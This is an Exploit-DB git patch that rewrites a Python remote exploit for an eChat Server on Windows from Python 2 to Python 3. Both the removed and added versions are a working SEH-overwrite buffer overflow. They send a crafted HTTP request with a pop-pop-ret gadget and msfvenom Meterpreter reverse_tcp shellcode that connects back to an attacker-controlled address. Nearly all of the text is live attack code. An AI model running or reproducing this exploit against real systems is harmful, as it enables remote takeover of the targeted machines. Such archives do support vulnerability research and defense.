From 34afdf0a9d8f05c8445def6e6f97aab266d46cda Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 4 Aug 2022 05:01:48 +0000
Subject: [PATCH] DB: 2022-08-04

1 changes to exploits/shellcodes
---
 exploits/windows/remote/50999.py | 103 ++++++++++++++++---------------
 1 file changed, 52 insertions(+), 51 deletions(-)

diff --git a/exploits/windows/remote/50999.py b/exploits/windows/remote/50999.py
index e922b17fb..dc21053c9 100755
--- a/exploits/windows/remote/50999.py
+++ b/exploits/windows/remote/50999.py
@@ -6,59 +6,60 @@
 # Installer: http://www.echatserver.com/
 # Tested on: Microsoft Windows 11 Pro x86-64 (10.0.22000 N/A Build 22000)
 
-#!/usr/bin/python
+#!/usr/bin/python3
 
-import sys, socket, time
+import sys
+import socket
+from struct import pack
 
-host = sys.argv[1] # Recieve IP from user
-port = int(sys.argv[2]) # Recieve Port from user
+host = sys.argv[1]  # Recieve IP from user
+port = int(sys.argv[2])  # Recieve Port from user
 
-#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 -f python -b "\x00\x20"
-buf =  ""
-buf += "\xbe\x4e\xdd\xd4\x27\xd9\xe9\xd9\x74\x24\xf4\x5b\x29"
-buf += "\xc9\xb1\x54\x31\x73\x13\x83\xc3\x04\x03\x73\x41\x3f"
-buf += "\x21\xdb\xb5\x3d\xca\x24\x45\x22\x42\xc1\x74\x62\x30"
-buf += "\x81\x26\x52\x32\xc7\xca\x19\x16\xfc\x59\x6f\xbf\xf3"
-buf += "\xea\xda\x99\x3a\xeb\x77\xd9\x5d\x6f\x8a\x0e\xbe\x4e"
-buf += "\x45\x43\xbf\x97\xb8\xae\xed\x40\xb6\x1d\x02\xe5\x82"
-buf += "\x9d\xa9\xb5\x03\xa6\x4e\x0d\x25\x87\xc0\x06\x7c\x07"
-buf += "\xe2\xcb\xf4\x0e\xfc\x08\x30\xd8\x77\xfa\xce\xdb\x51"
-buf += "\x33\x2e\x77\x9c\xfc\xdd\x89\xd8\x3a\x3e\xfc\x10\x39"
-buf += "\xc3\x07\xe7\x40\x1f\x8d\xfc\xe2\xd4\x35\xd9\x13\x38"
-buf += "\xa3\xaa\x1f\xf5\xa7\xf5\x03\x08\x6b\x8e\x3f\x81\x8a"
-buf += "\x41\xb6\xd1\xa8\x45\x93\x82\xd1\xdc\x79\x64\xed\x3f"
-buf += "\x22\xd9\x4b\x4b\xce\x0e\xe6\x16\x86\xe3\xcb\xa8\x56"
-buf += "\x6c\x5b\xda\x64\x33\xf7\x74\xc4\xbc\xd1\x83\x2b\x97"
-buf += "\xa6\x1c\xd2\x18\xd7\x35\x10\x4c\x87\x2d\xb1\xed\x4c"
-buf += "\xae\x3e\x38\xf8\xa4\xa8\x03\x55\xb8\x8a\xec\xa4\xb9"
-buf += "\xcd\x2a\x21\x5f\x81\xe2\x62\xf0\x61\x53\xc3\xa0\x09"
-buf += "\xb9\xcc\x9f\x29\xc2\x06\x88\xc3\x2d\xff\xe0\x7b\xd7"
-buf += "\x5a\x7a\x1a\x18\x71\x06\x1c\x92\x70\xf6\xd2\x53\xf0"
-buf += "\xe4\x02\x02\xfa\xf4\xd2\xaf\xfa\x9e\xd6\x79\xac\x36"
-buf += "\xd4\x5c\x9a\x98\x27\x8b\x98\xdf\xd7\x4a\xa9\x94\xe1"
-buf += "\xd8\x95\xc2\x0d\x0d\x16\x13\x5b\x47\x16\x7b\x3b\x33"
-buf += "\x45\x9e\x44\xee\xf9\x33\xd0\x11\xa8\xe0\x73\x7a\x56"
-buf += "\xde\xb3\x25\xa9\x35\xc0\x22\x55\xcb\xe4\x8a\x3e\x33"
-buf += "\xa8\x2a\xbf\x59\x28\x7b\xd7\x96\x07\x74\x17\x56\x82"
-buf += "\xdd\x3f\xdd\x42\xaf\xde\xe2\x4f\x71\x7f\xe2\x63\xaa"
-buf += "\x96\x6d\x84\x4d\x97\x8f\xb9\x9b\xae\xe5\xfa\x1f\x95"
-buf += "\xf6\xb1\x02\xbc\x9c\xb9\x11\xbe\xb4"
+junk = b"A" * 217
+nseh = pack("<L", 0x06eb9090)  # short jump 6 bytes
+seh = pack("<L", 0x1001ae86)  # pop pop ret 1001AE86 SSLEAY32.DLL
 
-junk = "A"*217
-nseh = "\xeb\x06\x90\x90" # short jump 6 bytes
-seh = "\x86\xae\x01\x10" # pop pop ret 1001AE86 SSLEAY32.DLL
-nops = "\x90"*16
+# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 -f python -b "\x00\x20" -v shellcode
+shellcode = b"\x90" * 16
+shellcode += b"\xbb\xb4\xa4\x34\xc3\xdd\xc1\xd9\x74\x24\xf4\x5a\x33"
+shellcode += b"\xc9\xb1\x52\x31\x5a\x12\x03\x5a\x12\x83\x5e\x58\xd6"
+shellcode += b"\x36\x62\x49\x95\xb9\x9a\x8a\xfa\x30\x7f\xbb\x3a\x26"
+shellcode += b"\xf4\xec\x8a\x2c\x58\x01\x60\x60\x48\x92\x04\xad\x7f"
+shellcode += b"\x13\xa2\x8b\x4e\xa4\x9f\xe8\xd1\x26\xe2\x3c\x31\x16"
+shellcode += b"\x2d\x31\x30\x5f\x50\xb8\x60\x08\x1e\x6f\x94\x3d\x6a"
+shellcode += b"\xac\x1f\x0d\x7a\xb4\xfc\xc6\x7d\x95\x53\x5c\x24\x35"
+shellcode += b"\x52\xb1\x5c\x7c\x4c\xd6\x59\x36\xe7\x2c\x15\xc9\x21"
+shellcode += b"\x7d\xd6\x66\x0c\xb1\x25\x76\x49\x76\xd6\x0d\xa3\x84"
+shellcode += b"\x6b\x16\x70\xf6\xb7\x93\x62\x50\x33\x03\x4e\x60\x90"
+shellcode += b"\xd2\x05\x6e\x5d\x90\x41\x73\x60\x75\xfa\x8f\xe9\x78"
+shellcode += b"\x2c\x06\xa9\x5e\xe8\x42\x69\xfe\xa9\x2e\xdc\xff\xa9"
+shellcode += b"\x90\x81\xa5\xa2\x3d\xd5\xd7\xe9\x29\x1a\xda\x11\xaa"
+shellcode += b"\x34\x6d\x62\x98\x9b\xc5\xec\x90\x54\xc0\xeb\xd7\x4e"
+shellcode += b"\xb4\x63\x26\x71\xc5\xaa\xed\x25\x95\xc4\xc4\x45\x7e"
+shellcode += b"\x14\xe8\x93\xd1\x44\x46\x4c\x92\x34\x26\x3c\x7a\x5e"
+shellcode += b"\xa9\x63\x9a\x61\x63\x0c\x31\x98\xe4\xf3\x6e\xd4\xf0"
+shellcode += b"\x9b\x6c\x18\xf8\xe6\xf8\xfe\x90\x08\xad\xa9\x0c\xb0"
+shellcode += b"\xf4\x21\xac\x3d\x23\x4c\xee\xb6\xc0\xb1\xa1\x3e\xac"
+shellcode += b"\xa1\x56\xcf\xfb\x9b\xf1\xd0\xd1\xb3\x9e\x43\xbe\x43"
+shellcode += b"\xe8\x7f\x69\x14\xbd\x4e\x60\xf0\x53\xe8\xda\xe6\xa9"
+shellcode += b"\x6c\x24\xa2\x75\x4d\xab\x2b\xfb\xe9\x8f\x3b\xc5\xf2"
+shellcode += b"\x8b\x6f\x99\xa4\x45\xd9\x5f\x1f\x24\xb3\x09\xcc\xee"
+shellcode += b"\x53\xcf\x3e\x31\x25\xd0\x6a\xc7\xc9\x61\xc3\x9e\xf6"
+shellcode += b"\x4e\x83\x16\x8f\xb2\x33\xd8\x5a\x77\x43\x93\xc6\xde"
+shellcode += b"\xcc\x7a\x93\x62\x91\x7c\x4e\xa0\xac\xfe\x7a\x59\x4b"
+shellcode += b"\x1e\x0f\x5c\x17\x98\xfc\x2c\x08\x4d\x02\x82\x29\x44"
 
-header = (
-        "GET /chat.ghp?username=" + junk + nseh + seh + nops + buf + "&password=&room=1&sex=1 HTTP/1.1\r\n"
-        "User-Agent: Mozilla/4.0\r\n"
-        "Host: 192.168.1.136:80\r\n"
-        "Accept-Language: en-us\r\n"
-        "Accept-Encoding: gzip, deflate\r\n"
-        "Referer: http://192.168.1.136\r\n"
-        "Connection: Keep-Alive\r\n\r\n"
-        )
-client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Declare a TCP socket
-client.connect((host, port)) # Connect to user supplied port and IP address
-client.send(header) # Send the user command with a variable length name
-client.close() # Close the Connection
\ No newline at end of file
+buffer = b"GET /chat.ghp?username=" + junk + nseh + seh + shellcode + b"&password=&room=1&sex=1 HTTP/1.1\r\n"
+buffer += b"User-Agent: Mozilla/4.0\r\n"
+buffer += b"Host: 192.168.1.136:80\r\n"
+buffer += b"Accept-Language: en-us\r\n"
+buffer += b"Accept-Encoding: gzip, deflate\r\n"
+buffer += b"Referer: http://192.168.1.136\r\n"
+buffer += b"Connection: Keep-Alive\r\n\r\n"
+
+print("[*] Sending evil buffer...")
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((host, port))
+s.send(buffer)
+s.close()
+print("[+] Done!")
\ No newline at end of file